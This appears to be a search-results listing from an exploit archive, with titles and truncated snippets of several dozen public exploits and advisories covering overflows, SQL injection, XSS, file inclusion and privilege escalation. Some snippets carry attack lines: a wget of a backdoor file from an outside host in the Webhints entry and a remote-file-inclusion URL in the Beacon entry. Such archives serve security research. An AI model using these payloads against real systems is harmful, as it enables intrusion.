41207 matches found
Microsoft Visual Basic 6.0 Project - Company Name Stack Overflow (PoC)
Microsoft Visual Basic 6.0 Project - Company Name Stack Overflow PoC !/usr/local/bin/perl Discovered By UmZ Umair Manzoor comments are welcome at umz32.dllatgmail.com Dated 23-02-2007 Time : 02:00 AM PST Visual Basic Project Company Name Stack Overflow Affected Version : Tested on Visual basic 6...
Beacon 0.2.0 - splash.lang.php Remote File Inclusion
Beacon 0.2.0 - splash.lang.php Remote File Inclusion Beacon = 2.0 Remote file inclusion languagePath Download script : http://download.savannah.gnu.org/releases/beacon/beacon020.zip Thanks Str0ke Exploit: http://victime.com/pbeaconpath/beacon/language/1/splash.lang.php?languagePath=shell.txt?...
XOOPS Module Kshop 1.17 - id SQL Injection
XOOPS Module Kshop 1.17 - id SQL Injection !/usr/bin/perl Script Name: XOOPS Module Kshop : "; $dir = ; chop $dir; if $dir = /exit/ print "-- Exploit FailedYou Are Exited \n"; exit; if $dir = /// else print "-- Exploit FailedNo DIR \n"; exit; print "User ID uid: "; $id = ; chop $id; $target =...
Microsoft Windows - Animated Cursor .ani Local Stack Overflow
Microsoft Windows - Animated Cursor .ani Local Stack Overflow / Copyright c 2007 devcode ^^ D E V C O D E ^^ Windows .ANI LoadAniIcon Stack Overflow CVE-2007-1765 Description: A vulnerability has been identified in Microsoft Windows, which could be exploited by remote attackers to take complete...
D-Link DWL-2000AP 2.11 - ARP Flood Remote Denial of Service
D-Link DWL-2000AP 2.11 - ARP Flood Remote Denial of Service / ARP FLOODER v0.1 - [email protected] - 2006-12-04 designed to crash D-LINK DWL-2000AP+ compile with: gcc arpflood.c -o arpflood / define BSDSOURCE 1 define GNUSOURCE include include include include include include include include...
KDPics 1.111.16 - galeries.inc.php3?categories Cross-Site Scripting
KDPics 1.111.16 - galeries.inc.php3?categories Cross-Site Scripting source: https://www.securityfocus.com/bid/21515/info KDPics is prone to multiple input-validation vulnerabilities, including cross-site scripting and remote file-include issues, because the application fails to sanitize...
Phoenix Evolution CMS - modulespageeditindex.php?pageid Cross-Site Scripting
Phoenix Evolution CMS - modulespageeditindex.php?pageid Cross-Site Scripting source: https://www.securityfocus.com/bid/20212/info Phoenix Evolution CMS is prone to multiple cross-site scripting vulnerabilities because the application fails to sanitize user-supplied input. An attacker may leverage...
RedBlog 0.5 - index.php Remote File Inclusion
RedBlog 0.5 - index.php Remote File Inclusion source: https://www.securityfocus.com/bid/19658/info RedBLoG is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit these issues to include an arbitrary remote file containing...
Fantastic News 2.1.3 - script_path Remote File Inclusion
Fantastic News 2.1.3 - scriptpath Remote File Inclusion ============================================================================================== Fantastic News = v2.1.3 CONFIGscriptpath Remote File Inclusion Exploit...
BlueCoat WinProxy 6.0 R1c - GET Denial of Service
BlueCoat WinProxy 6.0 R1c - GET Denial of Service !perl "WinProxy 6.0 R1c" Remote DoS Exploit Author: FistFucker e-Mail: [email protected] Advisory: http://www.idefense.com/intelligence/vulnerabilities/display.php?id=363 CVE info: CAN-2005-3187 use IO::Socket; destination IP address $ip =...
Noahs Classifieds 1.3 - index.php Cross-Site Scripting
Noahs Classifieds 1.3 - index.php Cross-Site Scripting source: https://www.securityfocus.com/bid/14835/info Noah's Classifieds is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage thi...
ATutor 1.4.3 - content.php?cid Cross-Site Scripting
ATutor 1.4.3 - content.php?cid Cross-Site Scripting source: https://www.securityfocus.com/bid/13972/info ATutor is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. An attacker may leverage any of...
Webhints 1.03 - Remote Command Execution (Perl) (1)
Webhints 1.03 - Remote Command Execution Perl 1 This exploit uses a backdoor that isn't located on this server. $cmde = "cd /tmp;wget http://www.khatotarh.com/NeT/alpha.txt"; change for your own needs. /str0ke !/usr/bin/perl T r a p - S e t U n d e r g r o u n d H a c k i n g T e a m EXPLOIT FOR:...
Microsoft Windows - COM Structured Storage Local (MS05-012)
Microsoft Windows - COM Structured Storage Local MS05-012 // by Cesar Cerrudo - Argeniss - www.argeniss.com // MS05-012 - COM Structured Storage Vulnerability - CAN-2005-0047 Exploit // // More exploits at www.argeniss.com/products.html // // Works on Win2k sp4, WinXP sp2, Win2k3 sp0 // Close all...
paNews 2.0b4 - Remote Admin Creation SQL Injection
paNews 2.0b4 - Remote Admin Creation SQL Injection / paNews v2.0b4 silePNEWSxpl This exploit utilize SQL injection for create a new user with admin privileges on paNews software system. References: packetstormsecurity.org/0503-exploits/panews.txt coded by: Silentium of Anacron Group Italy date:...
D-Forum 1.11 - Nav.php3 Cross-Site Scripting
D-Forum 1.11 - Nav.php3 Cross-Site Scripting source: https://www.securityfocus.com/bid/12720/info D-Forum is reportedly affected by a cross-site scripting vulnerability. This issue is due to the application failing to properly sanitize user-supplied input. As a result of this vulnerability, it is...
NapShare 1.2 - Remote Buffer Overflow (1)
NapShare 1.2 - Remote Buffer Overflow 1 // source: https://www.securityfocus.com/bid/11967/info It is reported that NapShare is susceptible to a remote buffer overflow vulnerability. This is due to a failure of the application to properly bounds check user-supplied data prior to copying it to a...
Linux Kernel 2.6.x - IPTables Logging Rules Integer Underflow Remote (PoC)
Linux Kernel 2.6.x - IPTables Logging Rules Integer Underflow Remote PoC / source: https://www.securityfocus.com/bid/11488/info It is reported that an integer underflow vulnerability is present in the iptables logging rules of the Linux kernel 2.6 branch. A remote attacker may exploit this...
Dropbear SSH 0.34 - Remote Code Execution
Dropbear SSH 0.34 - Remote Code Execution / Linux x86 Dropbear SSH quit Connection closed. % objdump -R /usr/local/sbin/dropbear| grep malloc 080673bc R386JUMPSLOT malloc % drop-root -v24 localhost ?.2022u%24$hn@localhost's password: Connection closed by 127.0.0.1 % telnet localhost 10275 Trying...
Jordan Windows Telnet Server 1.01.2 - Username Stack Buffer Overrun (1)
Jordan Windows Telnet Server 1.01.2 - Username Stack Buffer Overrun 1 source: https://www.securityfocus.com/bid/9316/info Jordan Windows Telnet Server has been reported prone to a remote buffer overrun vulnerability. The issue has been reported to present itself when a username of excessive lengt...
Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error (4)
Microsoft Windows XP/2000/NT 4.0 - Window Message Subsystem Design Error 4 // source: https://www.securityfocus.com/bid/5408/info A serious design error in the Win32 API has been reported. The issue is related to the inter-window message passing system. This vulnerability is wide-ranging and likely...
STunnel 3.x - Client Negotiation Protocol Format String
STunnel 3.x - Client Negotiation Protocol Format String // source: https://www.securityfocus.com/bid/3748/info Stunnel is a freely available, open source cryptography wrapper. It is designed to wrap arbitrary protocols that may or may not support cryptography. It is maintained by the Stunnel...
HP-UX 11.0 - SWVerify Buffer Overflow
HP-UX 11.0 - SWVerify Buffer Overflow // source: https://www.securityfocus.com/bid/3279/info HP-UX is the UNIX Operating System variant distributed by Hewlett-Packard, available for use on systems of size varying from workgroup servers to enterprise systems. A problem has been discovered in the...
RedHat Linux 6.1 i386 - Tmpwatch Recursive Write Denial of Service
RedHat Linux 6.1 i386 - Tmpwatch Recursive Write Denial of Service source: https://www.securityfocus.com/bid/1664/info Any user with write access to /tmp or /var/tmp can induce tmpwatch to cause Red Hat and others running tmpwatch from cron to stop responding, and possibly require a hard reboot...
Easy2Pilot 7 - Cross-Site Request Forgery (Add User)
Easy2Pilot 7 - Cross-Site Request Forgery Add User Exploit Title: Easy2Pilot 7 - Cross-Site Request Forgery Add User Author: indoushka Date: 2020-02-20 Tested on: windows 10 Français V.Pro / browser : Mozilla firefox 69.032-bit Vendor: http://easy2pilot-v7.com/ CVE: N/A poc : + Dorking İn Google ...
MyVideoConverter Pro 3.14 - Movie Buffer Overflow
MyVideoConverter Pro 3.14 - Movie Buffer Overflow Exploit Title: MyVideoConverter Pro 3.14 - 'Movie' Buffer Overflow Exploit Author : ZwX Exploit Date: 2020-02-11 Vendor Homepage : http://www.ivideogo.com/ Tested on OS: Windows 10 v1803 Social: twitter.com/ZwX2a Steps to Reproduce: 1. Run the...
iOS/macOS - Out-of-Bounds Timestamp Write in IOAccelCommandQueue2::processSegmentKernelCommand()
iOS/macOS - Out-of-Bounds Timestamp Write in IOAccelCommandQueue2::processSegmentKernelCommand While investigating possible shared memory issues in AGXCommandQueue::processSegmentKernelCommand, I noticed that the size checks used to parse the IOAccelKernelCommand in...
Ecommerce Systempay 1.0 - Production KEY Brute Force
Ecommerce Systempay 1.0 - Production KEY Brute Force Exploit Title: Ecommerce Systempay 1.0 - Production KEY Brute Force Author: live3 Date: 2020-02-05 Vendor Homepage: https://paiement.systempay.fr/doc/fr-FR/ Software Link: https://paiement.systempay.fr/doc/fr-FR/module-de-paiement-gratuit/ Test...
P2PWIFICAM2 for iOS 10.4.1 - Camera ID Denial of Service (PoC)
P2PWIFICAM2 for iOS 10.4.1 - Camera ID Denial of Service PoC Exploit Title: P2PWIFICAM2 for iOS 10.4.1 - 'Camera ID' Denial of Service PoC Discovery by: Ivan Marmolejo Discovery Date: 2020-02-02 Vendor Homepage: https://apps.apple.com/mx/app/p2pwificam2/id663665207 Software Link: App Store for iO...
Trend Micro Maximum Security 2019 - Arbitrary Code Execution
Trend Micro Maximum Security 2019 - Arbitrary Code Execution Exploit Title: Trend Micro Maximum Security 2019 - Arbitrary Code Execution Date: 2020-1-16 Exploit Author: hyp3rlinx Vendor Homepage: www.trendmicro.com Version: Platform Microsoft Windows, Premium Security 2019 v15, Maximum Security...
Online Book Store 1.0 - Arbitrary File Upload
Online Book Store 1.0 - Arbitrary File Upload Exploit Title: Online Book Store 1.0 - Arbitrary File Upload Google Dork: N/A Date: 2020-01-16 Exploit Author: Or4nG.M4n aka S4udiExploit Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/ Software...
AVE DOMINAplus 1.10.x - Credential Disclosure
AVE DOMINAplus 1.10.x - Credential Disclosure Exploit: AVE DOMINAplus 1.10.x - Credential Disclosure Date: 2019-12-30 Author: LiquidWorm Vendor: AVE S.p.A. Product web page: https://www.ave.it | https://www.domoticaplus.it Affected version: Web Server Code 53AB-WBS - 1.10.62 Advisory ID:...
Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation
Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation Exploit Title: Deutsche Bahn Ticket Vending Machine Local Kiosk - Privilege Escalation Date: 2019-12-18 Exploit Author: Vulnerability-Lab Vendor Homepage:...
Product Key Explorer 4.2.0.0 - Key Denial of Service (PoC)
Product Key Explorer 4.2.0.0 - Key Denial of Service PoC Exploit Title: Product Key Explorer 4.2.0.0 - 'Key' Denial of Service POC Discovery by: SajjadBnd Date: 2019-12-10 Vendor Homepage: http://www.nsauditor.com Software Link: http://www.nsauditor.com/downloads/productkeyexplorersetup.exe Teste...
ipPulse 1.92 - Enter Key Denial of Service (PoC)
ipPulse 1.92 - Enter Key Denial of Service PoC Exploit Title: ipPulse 1.92 - 'Enter Key' Denial of Service PoC Discovery by: Diego Buztamante Discovery Date: 2019-11-18 Vendor Homepage: https://www.netscantools.com/ippulseinfo.html Software Link : http://download.netscantools.com/ipls192.zip Test...
Prima FlexAir Access Control 2.3.38 - Remote Code Execution
Prima FlexAir Access Control 2.3.38 - Remote Code Execution Exploit Title: Prima FlexAir Access Control 2.3.38 - Remote Code Execution Google Dork: NA Date: 2018-09-06 Exploit Author: LiquidWorm Vendor Homepage: https://www.primasystems.eu/ Software Link:...
Alps HID Monitor Service 8.1.0.10 - ApHidMonitorService Unquote Service Path
Alps HID Monitor Service 8.1.0.10 - ApHidMonitorService Unquote Service Path Exploit Title: Alps HID Monitor Service 8.1.0.10 - 'ApHidMonitorService' Unquote Service Path Date: 2019-11-07 Exploit Author: Héctor Gabriel Chimecatl Hernández Vendor Homepage: https://www.alps.com/e/ Software Link:...
National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation
National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation Exploit Title: National Instruments Circuit Design Suite 14.0 - Local Privilege Escalation Discovery Date: 2019-10-10 Exploit Author: Ivan Marmolejo Vendor Homepage: http://www.ni.com/en-us.html Software Link:...
TP-Link TL-WR1043ND 2 - Authentication Bypass
TP-Link TL-WR1043ND 2 - Authentication Bypass Exploit Title: TP-Link TL-WR1043ND 2 - Authentication Bypass Date: 2019-06-20 Exploit Author: Uriel Kosayev Vendor Homepage: https://www.tp-link.com Version: TL-WR1043ND V2 Tested on: TL-WR1043ND V2 CVE : CVE-2019-6971 CVE Link:...
Subrion 4.2.1 - Email Persistant Cross-Site Scripting
Subrion 4.2.1 - Email Persistant Cross-Site Scripting Title: Subrion 4.2.1 - 'Email' Persistant Cross-Site Scripting Date: 2019-10-07 Author: Min Ko Ko Creatigon Vendor Homepage: https://subrion.org/ CVE : https://nvd.nist.gov/vuln/detail/CVE-2019-17225 Website : https://l33thacker.com Descriptio...
Gila CMS 1.11.1 - Local File Inclusion
Gila CMS 1.11.1 - Local File Inclusion Exploit Title: Authenticated Local File Inclusion (LFI) in GilaCMS Google Dork: N/A Date: 04-08-2019 Exploit Author: Sainadh Jamalpur Vendor Homepage: https://github.com/GilaCMS/gila Software Link: https://github.com/GilaCMS/gila Version: 1.10.9 Tested on: XAMP...
Microsoft DirectWrite - Invalid Read in SplicePixel While Processing OTF Fonts
Microsoft DirectWrite - Invalid Read in SplicePixel While Processing OTF Fonts Microsoft DirectWrite is a modern Windows API for high-quality text rendering. A majority of its code resides in the DWrite.dll user-mode library. It is used by a variety of widely used desktop programs such as the...
macOS iOS JavaScriptCore - Loop-Invariant Code Motion (LICM) Leaves Object Property Access Unguarded
macOS iOS JavaScriptCore - Loop-Invariant Code Motion LICM Leaves Object Property Access Unguarded While fuzzing JavaScriptCore, I encountered the following modified and commented JavaScript program which crashes jsc from current HEAD and release...
Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation
Microsoft Windows 7 build 7601 x86 - Local Privilege Escalation include include / EDB Note: Download https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47176.zip / / PREPROCESSOR DEFINITIONS / define MNSELECTITEM 0x1E5 define MNSELECTFIRSTVALIDITEM 0x1E7 define...
Cisco Wireless Controller 3.6.10E - Cross-Site Request Forgery
Cisco Wireless Controller 3.6.10E - Cross-Site Request Forgery Product : Cisco Wireless Controller Version : 3.6.10E last version Date: 23.07.2019 Vendor Homepage: https://www.cisco.com Exploit Author: Mehmet Önder Key Website: htts://cloudvist.com CVE: CVE-2019-12624 Description : The applicatio...
Microsoft Compiled HTML Help Uncompiled .chm File - XML External Entity Injection
Microsoft Compiled HTML Help Uncompiled .chm File - XML External Entity Injection + Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-HTML-HELP-UNCOMPILED-CHM-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt + ISR:...
Zoho ManageEngine ServiceDesk Plus 9.3 - SiteLookup.do Cross-Site Scripting
Zoho ManageEngine ServiceDesk Plus 9.3 - SiteLookup.do Cross-Site Scripting Exploit Title: Zoho ManageEngine ServiceDesk Plus 9.3 Cross-Site Scripting via SiteLookup.do Date: 2019-06-04 Exploit Author: Tarantula Team - VinCSS a member of Vingroup Vendor Homepage:...
Solaris 7/8/9 (SPARC) - dtprintinfo Local Privilege Escalation (2)
Solaris 7/8/9 SPARC - dtprintinfo Local Privilege Escalation 2 / raptordtprintnamesparc2.c - dtprintinfo 0day, Solaris/SPARC Copyright c 2004-2019 Marco Ivaldi 0day buffer overflow in the dtprintinfo1 CDE Print Viewer, leading to local root. Many thanks to Dave Aitel for discovering this...
LG Supersign EZ CMS - Remote Code Execution (Metasploit)
LG Supersign EZ CMS - Remote Code Execution Metasploit This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'LG Supersign EZ CMS RCE', 'Description' = %q LG SuperSignEZ CMS, that many LG SuperSign TVs...
Pegasus CMS 1.0 - extra_fields.php Plugin Remote Code Execution
Pegasus CMS 1.0 - extrafields.php Plugin Remote Code Execution Exploit Title: Pegasus extrafields.php Plugin Remote Code Execution Date: 14 March 2019 Exploit Author: R3zk0n Vendor Homepage: https://www.wisdom.com.au/web/pegasus-cms Software Link: N/A Version: 1.0 Tested on: Linux CVE : N/A The...